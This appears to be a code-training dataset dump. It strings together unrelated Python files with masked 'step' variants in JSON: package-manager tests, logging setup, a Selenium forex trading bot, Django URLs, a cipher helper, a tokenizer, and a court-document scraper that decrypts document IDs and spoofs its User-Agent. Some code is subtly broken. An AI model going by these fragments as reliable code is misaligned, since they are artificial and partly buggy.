super(TestUbuntuMock, self).test_sg3_utils()\n\n def test_check_unknown_package(self):\n with self._apply_patches():\n super(TestUbuntuMock, self).test_check_unknown_package()\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\nclass TestRedHatMock(TestOnRedHat):\n def _should_skip(self):\n pass\n\n def _rpm_query(self):\n return Output(stdout=b'sg3_utils-1.25-5.el5' if self._installed else b'package sg3_utils is not installed',\n returncode=0 if self._installed else 1)\n\n def _yum_install(self):\n self._installed = True\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch(\"infi.execute.execute\") as execute:\n def side_effect(*args, **kwargs):\n command = args[0]\n if \"-q\" in command:\n return self._rpm_query()\n elif \"install\" in command:\n return self._yum_install()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n super(TestRedHatMock, self).test_sg3_utils()\n pass\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\nclass test_package_versioning(unittest.TestCase):\n\n Solaris_v1 = b\"\"\" VERSION: 6.0.100.000,REV=08.01.2012.09.00\"\"\"\n Solaris_v2 = b\"\"\" VERSION: 5.14.2.5\"\"\"\n Ubuntu_v1 = b\"\"\"Version: 0.4.9-3ubuntu7.2\"\"\"\n Ubuntu_v2 = b\"\"\"Version: 1:1.2.8.dfsg-1ubuntu1\"\"\"\n rpm_v1 = b\"\"\"4.8-7.el7\"\"\"\n rpm_v2 = b\"\"\"18.168.6.1-34.el7\"\"\"\n def test_solaris_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v1\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.Solaris_v1)\n self.assertEqual(result, {'version': '6.0.100.000', 'revision': '08.01.2012.09.00'})\n\n def test_solaris_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v2\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.Solaris_v2)\n self.assertEqual(result, {'version': '5.14.2.5'})\n\n def test_ubuntu_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v1\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.Ubuntu_v1)\n self.assertEqual(result, {'version': '0.4.9-3ubuntu7.2'})\n\n def test_ubuntu_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v2\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.Ubuntu_v2)\n self.assertEqual(result, {'version': '1:1.2.8.dfsg-1ubuntu1'})\n\n def test_rpm_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v1\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v1)\n self.assertEqual(result, {'version': '4.8-7.el7'})\n\n def test_rpm_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v2\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v2)\n self.assertEqual(result, {'version': '18.168.6.1-34.el7'})\n\nclass GeneralTest(unittest.TestCase):\n def _is_solaris(self):\n from infi.os_info import get_platform_string\n return get_platform_string().split('-')[0] == 'solaris'\n\n def test_get_package_manager(self):\n package_manager = pkgmgr.get_package_manager()\n package_to_check = 'python'\n if self._is_solaris():\n package_to_check = 'CSW' + package_to_check\n self.assertTrue(package_manager.is_package_installed(package_to_check))\n", "step-ids": [ 27, 33, 43, 46, 53 ] }
[ 27, 33, 43, 46, 53 ]
import logging.config import os import sys import yaml sys.path.append(os.path.join(os.path.abspath('.'), '..', '..')) def setup_logging(default_path='common/config/logging.yaml'): path = default_path if os.path.exists(path): with open(path, 'rt') as f: config = yaml.safe_load(f.read()) logging.config.dictConfig(config) else: logging.basicConfig(level=default_level)
normal
{ "blob_id": "6657f0b51bc021e6b5867bbdd1a520c2b0cb92b3", "index": 2367, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef setup_logging(default_path='common/config/logging.yaml'):\n path = default_path\n if os.path.exists(path):\n with open(path, 'rt') as f:\n config = yaml.safe_load(f.read())\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n", "step-3": "<mask token>\nsys.path.append(os.path.join(os.path.abspath('.'), '..', '..'))\n\n\ndef setup_logging(default_path='common/config/logging.yaml'):\n path = default_path\n if os.path.exists(path):\n with open(path, 'rt') as f:\n config = yaml.safe_load(f.read())\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n", "step-4": "import logging.config\nimport os\nimport sys\nimport yaml\nsys.path.append(os.path.join(os.path.abspath('.'), '..', '..'))\n\n\ndef setup_logging(default_path='common/config/logging.yaml'):\n path = default_path\n if os.path.exists(path):\n with open(path, 'rt') as f:\n config = yaml.safe_load(f.read())\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
__author__ = 'cromox' from time import sleep import inspect from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.common.by import By from selenium.webdriver.support import expected_conditions as EC from Forex_CFD.features.main_page import FxMainPage class FxBuySell(FxMainPage): def __init__(self, driver): super().__init__(driver) self.driver = driver def buy(self, amount): self.log.info("--> " + inspect.stack()[0][3] + " started") if self.driver.find_element_by_xpath("//div[@class='visible-input']//input[contains(@id, 'uniqName')]"): # element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located( # (By.XPATH, "//div[@class='visible-input']//input[contains(@id, 'uniqName')]"))) element = self.driver.find_elements_by_xpath("//div[@class='visible-input']//input[contains(@id, 'uniqName')]")[0] element.clear() for character in str(amount): element.send_keys(character) sleep(0.5) # Confirm Button if self.driver.find_element_by_xpath("//div[contains(@class,'confirm-button')]"): self.driver.find_elements_by_xpath("//div[contains(@class,'confirm-button')]")[0].click() elif self.driver.find_element_by_xpath("//*[contains(text(),'Market closed')]"): print('Market closed') self.driver.find_elements_by_xpath("//*[@class='header']//*[@class='close-icon']")[0].click() def sell(self, amount): self.log.info("--> " + inspect.stack()[0][3] + " started") # Switching to sell self.driver.find_elements_by_xpath("//div[@data-dojo-attach-event='click: setDirectionSell']")[0].click() # From there on it's exactly like the buy self.buy(amount) def script_click_xpath(self, xpath): self.log.info("--> " + inspect.stack()[0][3] + " started") self.driver.execute_script(f"document.evaluate(\"{xpath}\", document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue.click()") def open_stock_dialog(self, stock): self.log.info("--> " + inspect.stack()[0][3] + " started") WebDriverWait(self.driver, 5).until(EC.visibility_of_any_elements_located((By.XPATH, "//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]"))) elem = self.driver.find_elements_by_xpath("//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]") # try both elements try: elem[0].click() except: elem[1].click() # Search the stock elem = self.driver.find_element_by_xpath("//input[@placeholder=\"Instrument search\"]") # Setting the max length to 100 so the API'll be able to enter long stocks names self.driver.execute_script("arguments[0].setAttribute('maxlength',arguments[1])", elem, 100) elem.send_keys(stock) # Open its dialog with JS. Selenium couldn't open the dialog itself. self.script_click_xpath(f"//*[@id='list-results-instruments']//span[contains(@class, 'instrument-name') and .='{stock}']") sleep(1) def buy_stock(self, stock, amount): self.log.info("--> " + inspect.stack()[0][3] + " started") self.open_stock_dialog(stock) self.buy(amount) sleep(0.5) def sell_stock(self, stock, amount): self.log.info("--> " + inspect.stack()[0][3] + " started") # It's just opening a stock and selling it self.open_stock_dialog(stock) self.sell(amount) sleep(0.5)
normal
{ "blob_id": "5850be6aef6e4adb36a122cb8e5ffe044b1c9009", "index": 4589, "step-1": "<mask token>\n\n\nclass FxBuySell(FxMainPage):\n <mask token>\n\n def buy(self, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n if self.driver.find_element_by_xpath(\n \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"):\n element = self.driver.find_elements_by_xpath(\n \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"\n )[0]\n element.clear()\n for character in str(amount):\n element.send_keys(character)\n sleep(0.5)\n if self.driver.find_element_by_xpath(\n \"//div[contains(@class,'confirm-button')]\"):\n self.driver.find_elements_by_xpath(\n \"//div[contains(@class,'confirm-button')]\")[0].click()\n elif self.driver.find_element_by_xpath(\n \"//*[contains(text(),'Market closed')]\"):\n print('Market closed')\n self.driver.find_elements_by_xpath(\n \"//*[@class='header']//*[@class='close-icon']\")[0].click()\n <mask token>\n <mask token>\n\n def open_stock_dialog(self, stock):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n WebDriverWait(self.driver, 5).until(EC.\n visibility_of_any_elements_located((By.XPATH,\n \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")))\n elem = self.driver.find_elements_by_xpath(\n \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")\n try:\n elem[0].click()\n except:\n elem[1].click()\n elem = self.driver.find_element_by_xpath(\n '//input[@placeholder=\"Instrument search\"]')\n self.driver.execute_script(\n \"arguments[0].setAttribute('maxlength',arguments[1])\", elem, 100)\n elem.send_keys(stock)\n self.script_click_xpath(\n f\"//*[@id='list-results-instruments']//span[contains(@class, 'instrument-name') and .='{stock}']\"\n )\n sleep(1)\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass FxBuySell(FxMainPage):\n <mask token>\n\n def buy(self, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n if self.driver.find_element_by_xpath(\n \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"):\n element = self.driver.find_elements_by_xpath(\n \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"\n )[0]\n element.clear()\n for character in str(amount):\n element.send_keys(character)\n sleep(0.5)\n if self.driver.find_element_by_xpath(\n \"//div[contains(@class,'confirm-button')]\"):\n self.driver.find_elements_by_xpath(\n \"//div[contains(@class,'confirm-button')]\")[0].click()\n elif self.driver.find_element_by_xpath(\n \"//*[contains(text(),'Market closed')]\"):\n print('Market closed')\n self.driver.find_elements_by_xpath(\n \"//*[@class='header']//*[@class='close-icon']\")[0].click()\n <mask token>\n <mask token>\n\n def open_stock_dialog(self, stock):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n WebDriverWait(self.driver, 5).until(EC.\n visibility_of_any_elements_located((By.XPATH,\n \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")))\n elem = self.driver.find_elements_by_xpath(\n \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")\n try:\n elem[0].click()\n except:\n elem[1].click()\n elem = self.driver.find_element_by_xpath(\n '//input[@placeholder=\"Instrument search\"]')\n self.driver.execute_script(\n \"arguments[0].setAttribute('maxlength',arguments[1])\", elem, 100)\n elem.send_keys(stock)\n self.script_click_xpath(\n f\"//*[@id='list-results-instruments']//span[contains(@class, 'instrument-name') and .='{stock}']\"\n )\n sleep(1)\n\n def buy_stock(self, stock, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.open_stock_dialog(stock)\n self.buy(amount)\n sleep(0.5)\n\n def sell_stock(self, stock, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.open_stock_dialog(stock)\n self.sell(amount)\n sleep(0.5)\n", "step-3": "<mask token>\n\n\nclass FxBuySell(FxMainPage):\n\n def __init__(self, driver):\n super().__init__(driver)\n self.driver = driver\n\n def buy(self, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n if self.driver.find_element_by_xpath(\n \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"):\n element = self.driver.find_elements_by_xpath(\n \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"\n )[0]\n element.clear()\n for character in str(amount):\n element.send_keys(character)\n sleep(0.5)\n if self.driver.find_element_by_xpath(\n \"//div[contains(@class,'confirm-button')]\"):\n self.driver.find_elements_by_xpath(\n \"//div[contains(@class,'confirm-button')]\")[0].click()\n elif self.driver.find_element_by_xpath(\n \"//*[contains(text(),'Market closed')]\"):\n print('Market closed')\n self.driver.find_elements_by_xpath(\n \"//*[@class='header']//*[@class='close-icon']\")[0].click()\n\n def sell(self, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.driver.find_elements_by_xpath(\n \"//div[@data-dojo-attach-event='click: setDirectionSell']\")[0\n ].click()\n self.buy(amount)\n\n def script_click_xpath(self, xpath):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.driver.execute_script(\n f'document.evaluate(\"{xpath}\", document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue.click()'\n )\n\n def open_stock_dialog(self, stock):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n WebDriverWait(self.driver, 5).until(EC.\n visibility_of_any_elements_located((By.XPATH,\n \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")))\n elem = self.driver.find_elements_by_xpath(\n \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")\n try:\n elem[0].click()\n except:\n elem[1].click()\n elem = self.driver.find_element_by_xpath(\n '//input[@placeholder=\"Instrument search\"]')\n self.driver.execute_script(\n \"arguments[0].setAttribute('maxlength',arguments[1])\", elem, 100)\n elem.send_keys(stock)\n self.script_click_xpath(\n f\"//*[@id='list-results-instruments']//span[contains(@class, 'instrument-name') and .='{stock}']\"\n )\n sleep(1)\n\n def buy_stock(self, stock, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.open_stock_dialog(stock)\n self.buy(amount)\n sleep(0.5)\n\n def sell_stock(self, stock, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.open_stock_dialog(stock)\n self.sell(amount)\n sleep(0.5)\n", "step-4": "__author__ = 'cromox'\n<mask token>\n\n\nclass FxBuySell(FxMainPage):\n\n def __init__(self, driver):\n super().__init__(driver)\n self.driver = driver\n\n def buy(self, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n if self.driver.find_element_by_xpath(\n \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"):\n element = self.driver.find_elements_by_xpath(\n \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"\n )[0]\n element.clear()\n for character in str(amount):\n element.send_keys(character)\n sleep(0.5)\n if self.driver.find_element_by_xpath(\n \"//div[contains(@class,'confirm-button')]\"):\n self.driver.find_elements_by_xpath(\n \"//div[contains(@class,'confirm-button')]\")[0].click()\n elif self.driver.find_element_by_xpath(\n \"//*[contains(text(),'Market closed')]\"):\n print('Market closed')\n self.driver.find_elements_by_xpath(\n \"//*[@class='header']//*[@class='close-icon']\")[0].click()\n\n def sell(self, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.driver.find_elements_by_xpath(\n \"//div[@data-dojo-attach-event='click: setDirectionSell']\")[0\n ].click()\n self.buy(amount)\n\n def script_click_xpath(self, xpath):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.driver.execute_script(\n f'document.evaluate(\"{xpath}\", document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue.click()'\n )\n\n def open_stock_dialog(self, stock):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n WebDriverWait(self.driver, 5).until(EC.\n visibility_of_any_elements_located((By.XPATH,\n \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")))\n elem = self.driver.find_elements_by_xpath(\n \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")\n try:\n elem[0].click()\n except:\n elem[1].click()\n elem = self.driver.find_element_by_xpath(\n '//input[@placeholder=\"Instrument search\"]')\n self.driver.execute_script(\n \"arguments[0].setAttribute('maxlength',arguments[1])\", elem, 100)\n elem.send_keys(stock)\n self.script_click_xpath(\n f\"//*[@id='list-results-instruments']//span[contains(@class, 'instrument-name') and .='{stock}']\"\n )\n sleep(1)\n\n def buy_stock(self, stock, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.open_stock_dialog(stock)\n self.buy(amount)\n sleep(0.5)\n\n def sell_stock(self, stock, amount):\n self.log.info('--> ' + inspect.stack()[0][3] + ' started')\n self.open_stock_dialog(stock)\n self.sell(amount)\n sleep(0.5)\n", "step-5": "__author__ = 'cromox'\n\nfrom time import sleep\nimport inspect\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom Forex_CFD.features.main_page import FxMainPage\n\nclass FxBuySell(FxMainPage):\n\n def __init__(self, driver):\n super().__init__(driver)\n self.driver = driver\n\n def buy(self, amount):\n self.log.info(\"--> \" + inspect.stack()[0][3] + \" started\")\n if self.driver.find_element_by_xpath(\"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\"):\n # element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(\n # (By.XPATH, \"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\")))\n element = self.driver.find_elements_by_xpath(\"//div[@class='visible-input']//input[contains(@id, 'uniqName')]\")[0]\n element.clear()\n for character in str(amount):\n element.send_keys(character)\n sleep(0.5)\n # Confirm Button\n if self.driver.find_element_by_xpath(\"//div[contains(@class,'confirm-button')]\"):\n self.driver.find_elements_by_xpath(\"//div[contains(@class,'confirm-button')]\")[0].click()\n elif self.driver.find_element_by_xpath(\"//*[contains(text(),'Market closed')]\"):\n print('Market closed')\n self.driver.find_elements_by_xpath(\"//*[@class='header']//*[@class='close-icon']\")[0].click()\n\n def sell(self, amount):\n self.log.info(\"--> \" + inspect.stack()[0][3] + \" started\")\n # Switching to sell\n self.driver.find_elements_by_xpath(\"//div[@data-dojo-attach-event='click: setDirectionSell']\")[0].click()\n # From there on it's exactly like the buy\n self.buy(amount)\n\n def script_click_xpath(self, xpath):\n self.log.info(\"--> \" + inspect.stack()[0][3] + \" started\")\n self.driver.execute_script(f\"document.evaluate(\\\"{xpath}\\\", document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue.click()\")\n\n def open_stock_dialog(self, stock):\n self.log.info(\"--> \" + inspect.stack()[0][3] + \" started\")\n WebDriverWait(self.driver, 5).until(EC.visibility_of_any_elements_located((By.XPATH, \"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")))\n elem = self.driver.find_elements_by_xpath(\"//span[contains(@data-dojo-attach-event, 'onOpenDialogClick')]\")\n # try both elements\n try:\n elem[0].click()\n except:\n elem[1].click()\n # Search the stock\n elem = self.driver.find_element_by_xpath(\"//input[@placeholder=\\\"Instrument search\\\"]\")\n # Setting the max length to 100 so the API'll be able to enter long stocks names\n self.driver.execute_script(\"arguments[0].setAttribute('maxlength',arguments[1])\", elem, 100)\n elem.send_keys(stock)\n # Open its dialog with JS. Selenium couldn't open the dialog itself.\n self.script_click_xpath(f\"//*[@id='list-results-instruments']//span[contains(@class, 'instrument-name') and .='{stock}']\")\n sleep(1)\n\n def buy_stock(self, stock, amount):\n self.log.info(\"--> \" + inspect.stack()[0][3] + \" started\")\n self.open_stock_dialog(stock)\n self.buy(amount)\n sleep(0.5)\n\n def sell_stock(self, stock, amount):\n self.log.info(\"--> \" + inspect.stack()[0][3] + \" started\")\n # It's just opening a stock and selling it\n self.open_stock_dialog(stock)\n self.sell(amount)\n sleep(0.5)", "step-ids": [ 3, 5, 8, 9, 11 ] }
[ 3, 5, 8, 9, 11 ]
from django.conf.urls import url #from .views import CommandReceiveView from .views import index, send_message urlpatterns = [ #url(r'^bot/(?P<bot_token>.+)/$', CommandReceiveView.as_view(), name='command'), url(r'^send_message$', send_message, name='send_message'), url(r'^$', index, name='index'), ]
normal
{ "blob_id": "6cc56f73e58366a3906da537cc27fdd5a066ee34", "index": 2647, "step-1": "<mask token>\n", "step-2": "<mask token>\nurlpatterns = [url('^send_message$', send_message, name='send_message'),\n url('^$', index, name='index')]\n", "step-3": "from django.conf.urls import url\nfrom .views import index, send_message\nurlpatterns = [url('^send_message$', send_message, name='send_message'),\n url('^$', index, name='index')]\n", "step-4": "from django.conf.urls import url\n\n#from .views import CommandReceiveView\nfrom .views import index, send_message\n\nurlpatterns = [\n #url(r'^bot/(?P<bot_token>.+)/$', CommandReceiveView.as_view(), name='command'),\n url(r'^send_message$', send_message, name='send_message'),\n url(r'^$', index, name='index'),\n]\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
def build_shift_dict(self, shift): ''' Creates a dictionary that can be used to apply a cipher to a letter. The dictionary maps every uppercase and lowercase letter to a character shifted down the alphabet by the input shift. The dictionary should have 52 keys of all the uppercase letters and all the lowercase letters only. shift (integer): the amount by which to shift every letter of the alphabet. 0 <= shift < 26 Returns: a dictionary mapping a letter (string) to another letter (string). ''' # create a new list of letters based on the shift shifted_lowercase = list(string.ascii_lowercase[shift:]) + list(string.ascii_lowercase[:shift]) shifted_uppercase = list(string.ascii_uppercase[shift:]) + list(string.ascii_uppercase[:shift]) # empty dict d = {} # populate dict for lowercase for l in range(len(string.ascii_lowercase)): d[string.ascii_lowercase[l]] = shifted_lowercase[l] # populate dict for uppercase for l in range(len(string.ascii_uppercase)): d[string.ascii_uppercase[l]] = shifted_uppercase[l] return d
normal
{ "blob_id": "07d2da14d0122ad2c8407bb13b8567ca62356bef", "index": 7515, "step-1": "<mask token>\n", "step-2": "def build_shift_dict(self, shift):\n \"\"\"\n Creates a dictionary that can be used to apply a cipher to a letter.\n The dictionary maps every uppercase and lowercase letter to a\n character shifted down the alphabet by the input shift. The dictionary\n should have 52 keys of all the uppercase letters and all the lowercase\n letters only.\n\n shift (integer): the amount by which to shift every letter of the\n alphabet. 0 <= shift < 26\n\n Returns: a dictionary mapping a letter (string) to\n another letter (string).\n \"\"\"\n shifted_lowercase = list(string.ascii_lowercase[shift:]) + list(string.\n ascii_lowercase[:shift])\n shifted_uppercase = list(string.ascii_uppercase[shift:]) + list(string.\n ascii_uppercase[:shift])\n d = {}\n for l in range(len(string.ascii_lowercase)):\n d[string.ascii_lowercase[l]] = shifted_lowercase[l]\n for l in range(len(string.ascii_uppercase)):\n d[string.ascii_uppercase[l]] = shifted_uppercase[l]\n return d\n", "step-3": "def build_shift_dict(self, shift):\n '''\n Creates a dictionary that can be used to apply a cipher to a letter.\n The dictionary maps every uppercase and lowercase letter to a\n character shifted down the alphabet by the input shift. The dictionary\n should have 52 keys of all the uppercase letters and all the lowercase\n letters only.\n\n shift (integer): the amount by which to shift every letter of the\n alphabet. 0 <= shift < 26\n\n Returns: a dictionary mapping a letter (string) to\n another letter (string).\n '''\n # create a new list of letters based on the shift\n shifted_lowercase = list(string.ascii_lowercase[shift:]) + list(string.ascii_lowercase[:shift])\n shifted_uppercase = list(string.ascii_uppercase[shift:]) + list(string.ascii_uppercase[:shift])\n\n # empty dict\n d = {}\n\n # populate dict for lowercase\n for l in range(len(string.ascii_lowercase)):\n d[string.ascii_lowercase[l]] = shifted_lowercase[l]\n\n # populate dict for uppercase\n for l in range(len(string.ascii_uppercase)):\n d[string.ascii_uppercase[l]] = shifted_uppercase[l]\n\n return d", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import re f = open('q4text.txt') text = f.read() f.close() pattern = r'''[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\b[A-Z][a-z]+[.]|\b[A-Za-z]+['][a-z]+|[A-Z.]+[A-Z]|\b[A-Za-z-]+|[.]+|[.,'"!?:;]''' word_token = re.findall(pattern, text) token_dictionary = {} for element in word_token: if element in token_dictionary: token_dictionary[element] += 1 else: token_dictionary[element] = 1 for key in sorted(token_dictionary.keys()): print("{} {}".format(key, token_dictionary[key])) print('Tokens: ' + str(len(word_token))) print('Types: ' + str(len(token_dictionary)))
normal
{ "blob_id": "2e27302abbe239c1a6067a9eb52f5a857fff7dd2", "index": 1736, "step-1": "<mask token>\n", "step-2": "<mask token>\nf.close()\n<mask token>\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n", "step-3": "<mask token>\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = (\n '[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\\\b[A-Z][a-z]+[.]|\\\\b[A-Za-z]+[\\'][a-z]+|[A-Z.]+[A-Z]|\\\\b[A-Za-z-]+|[.]+|[.,\\'\"!?:;]'\n )\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n", "step-4": "import re\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = (\n '[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\\\b[A-Z][a-z]+[.]|\\\\b[A-Za-z]+[\\'][a-z]+|[A-Z.]+[A-Z]|\\\\b[A-Za-z-]+|[.]+|[.,\\'\"!?:;]'\n )\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n", "step-5": "import re\n\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = r'''[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\b[A-Z][a-z]+[.]|\\b[A-Za-z]+['][a-z]+|[A-Z.]+[A-Z]|\\b[A-Za-z-]+|[.]+|[.,'\"!?:;]'''\n\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\n\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\n\nfor key in sorted(token_dictionary.keys()):\n print(\"{} {}\".format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#!/usr/bin/env python # -*- coding: utf-8 -*- # File: wenshu/actions.py # Author: Carolusian <https://github.com/carolusian> # Date: 22.09.2018 # Last Modified Date: 22.09.2018 # # Copyright 2018 Carolusian import time import itertools import re import requests import json import os from random import randint from selenium import webdriver from selenium.webdriver.common.by import By from selenium.common.exceptions import ElementNotInteractableException from .exceptions import UnsupportedPlatformException from .config import get_logger, DOC_LINK_BASE from .utils import retry logger = get_logger(__name__) def sleep(min_seconds=1, max_seconds=10): """Allow a browser instance to wait for a few seconds before do something""" time.sleep(randint(min_seconds, max_seconds)) def click(elem): try: elem.click() except ElementNotInteractableException: pass def open_website(url): """ Open website of target url """ browser = webdriver.Firefox() browser.get(url) return browser def is_finished(browser): finish_text = '无符合条件的数据...' sleep_secs = 15 time.sleep(sleep_secs) result_list = browser.find_element_by_id('resultList') # Refresh if no result found if finish_text in result_list.text: logger.info('Try refresh to reload content') browser.refresh() time.sleep(sleep_secs) # If still not result found, finish downloading result_list = browser.find_element_by_id('resultList') if finish_text in result_list.text: return True return False def download_docs(browser, save_dir='./', click_next_page=False): if click_next_page: next_page = browser.find_elements(By.XPATH, '//*[@id="pageNumber"]/a[contains(text(), "下一页")]') next_page[0].click() if is_finished(browser): logger.info('Finished downloading documents in this page.') return link_xpath = '//*[@class="dataItem"]' keywords_elems = browser.find_elements(By.XPATH, '//*[@class="contentCondtion"]') subfolder = '-'.join([el.text for el in keywords_elems]) elems = browser.find_elements(By.XPATH, link_xpath) for el in elems: save_doc(browser, el, os.path.join(save_dir, subfolder)) time.sleep(1) # Goto next page after this page is download download_docs(browser, save_dir, click_next_page=True) @retry(times=5, delay=5, allowed_exceptions=IndexError) def save_doc(browser, doc_elem, save_dir): doc_key = doc_elem.get_attribute('key') doc_title = doc_elem.get_attribute('title') logger.info('Found document %s.' % doc_title) unzipped_id = browser.execute_script('return unzip("%s")' % doc_key) doc_id = browser.execute_script('return com.str.Decrypt("%s")' % unzipped_id) doc_link = DOC_LINK_BASE % doc_id headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} p = re.compile('(var jsonHtmlData = ")(.+)(\\"}";)') resp = requests.get(doc_link, headers=headers) resp_text = resp.text resp_obj = p.findall(resp_text)[0][1].replace('\\', '') + '"}' resp_obj = json.loads(resp_obj) os.makedirs(save_dir, exist_ok=True) with open(os.path.join(save_dir, resp_obj['Title'] + '.html'), 'w') as f: f.write(resp_obj['Html']) logger.info('Downloaded %s.' % resp_obj['Title'])
normal
